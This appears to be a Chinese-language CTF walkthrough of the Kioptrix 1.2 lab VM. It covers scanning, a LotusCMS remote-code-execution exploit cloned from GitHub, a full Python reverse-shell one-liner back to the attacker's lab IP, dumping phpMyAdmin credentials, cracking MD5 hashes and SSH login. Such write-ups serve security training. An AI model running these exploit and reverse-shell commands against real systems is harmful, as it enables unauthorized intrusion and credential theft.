zoukankan      html  css  js  c++  java
  • kioprtix level 1.2

    kioprtix level 1.2

    存活探测+端口扫描

    image-20211209203946394

    访问80

    image-20211209204053423

    同时做一个目录扫描

    发现

    http://10.0.4.18/phpmyadmin/index.php
    

    指纹识别

    image-20211209205217428

    cms漏洞查找

    image-20211209205247480

    测试代码执行,存在漏洞

    反弹shell

    github找到poc

    git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit

    git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit
    cd LotusCMS-Exploit/
    chmod 777 lotusRCE.sh
    nc -lvp <port>
    ./lotusRCE.sh 10.0.4.18
    <你的ip>
    <刚才的port>
    1
    

    image-20211209211729394

    交互的会话,采用再次反弹

    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.4.10',5656));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    

    image-20211209212050160

    寻找敏感信息

    image-20211209212334755

    image-20211209212537020

    看到数据库账号和密码

    登录phpmyadmin

    image-20211209212629885

    image-20211209212833943看到超管密码,测试无法ssh登录,估计是we端的

    image-20211209213129371

    还有一个

    image-20211209213147142

    md5解密下

    image-20211209213214570

    image-20211209213225815

    starwars Mast3r

    尝试ssh登录,成功登录

    image-20211209213329410

    image-20211209213800378

    image-20211209213854999

    登录后发现loneferrethome下有几个文件

    查看

    image-20211209214002653

    这个应该就是提权的暗示了

    百度教程

    image-20211209215543062

    image-20211209215530669

  • 相关阅读:
    178
    177
    176
    175
    To Do List
    洛谷 P4198 楼房重建
    斯特林数
    容斥原理
    组合数学笔记
    激光相机数据融合(6)--激光相机标定
  • 原文地址:https://www.cnblogs.com/liyu8/p/15669492.html
Copyright © 2011-2022 走看看